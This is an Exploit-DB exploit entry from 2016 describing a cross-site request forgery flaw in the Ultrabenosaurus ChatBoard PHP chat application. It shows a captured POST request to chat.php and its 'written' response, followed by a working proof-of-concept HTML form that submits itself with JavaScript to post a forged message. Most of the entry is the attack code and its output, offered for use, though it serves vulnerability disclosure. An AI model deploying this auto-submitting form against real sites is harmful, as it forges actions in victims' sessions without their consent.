Ultrabenosaurus ChatBoard – Cross-Site Request Forgery (Send Message)

  • 作者: HaHwul
    日期: 2016-06-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39949/
  • <!-- 
    # Exploit Title: Ultrabenosaurus ChatBoard - CSRF(Send Message)
    # Date: 2016-06-14
    # Exploit Author: HaHwul
    # Exploit Author Blog: www.hahwul.com
    # Vendor Homepage: http://ultrabenosaurus.ninja/
    # Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
    # Tested on: Debian [wheezy]
    
    ### Vulnerability Code
    -----------------------------------------------------------------------------------------
    POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://CSRF_NO_REFERE_CHECK
    Content-Length: 8
    Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
    Connection: keep-alive
    
    msg=CSRF
    ### Response
    -----------------------------------------------------------------------------------------
    HTTP/1.1 200 OK
    Date: Tue, 14 Jun 2016 01:52:02 GMT
    Server: Apache/2.4.10 (Ubuntu)
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Length: 7
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    
    written
    -----------------------------------------------------------------------------------------
    
    ### Vulnerability Code
    -->
    
    <form name="csrf_poc" action="http://127.0.0.1/vul_test/ChatBoard/__original/chat.php" method="POST">
    <input type="hidden" name="msg" value="CSRF">
    <input type="submit" value="CSRF Attack">
    </form>
    <script type="text/javascript">document.forms.csrf_poc.submit();</script>